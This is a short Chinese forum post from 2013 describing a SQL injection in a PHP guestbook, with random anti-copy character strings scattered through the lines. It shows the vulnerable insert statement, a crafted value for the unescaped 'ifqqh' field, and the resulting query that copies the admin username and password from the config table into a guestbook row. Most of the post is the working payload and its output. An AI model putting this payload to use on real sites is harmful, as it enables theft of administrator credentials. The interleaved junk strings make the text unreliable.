留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。
/ ]. O4 p3 R! u S7 K/ r% k: ^% f7 W; m9 Z: ?* P! M! b8 e
$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。; ~! J+ P1 ]+ v# I5 O& L! W0 ^
$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响3 j' K" j2 f* ~; [. O' [
/ @, F# T2 | ^; i T4 Q. f提交的时候把ifqqh的值改一下。变成
- b) ]: [& p# M5 A1 e0 v2 ^' X% r# u% ^) o% M
<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />8 n7 K6 g5 B; b$ o* k: q- h
- w0 o/ l3 a& z" ~. ^9 |这样SQL插入语句就变了.0 S0 ?7 S0 ^$ e/ T: O
* L: i9 Y% l! G ?+ a' u; i: I
insert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)
" X- s( `0 D1 G/ J: q* E x
2 Q+ J6 B: L P$ `# V: I" S构造了另外一句SQL。并且把帐号密码读出来。
% H/ u8 e, c4 N! C
! l/ o4 P; `6 z* T6 b |
发表于 2013-2-19 08:10:11
收藏
支持
反对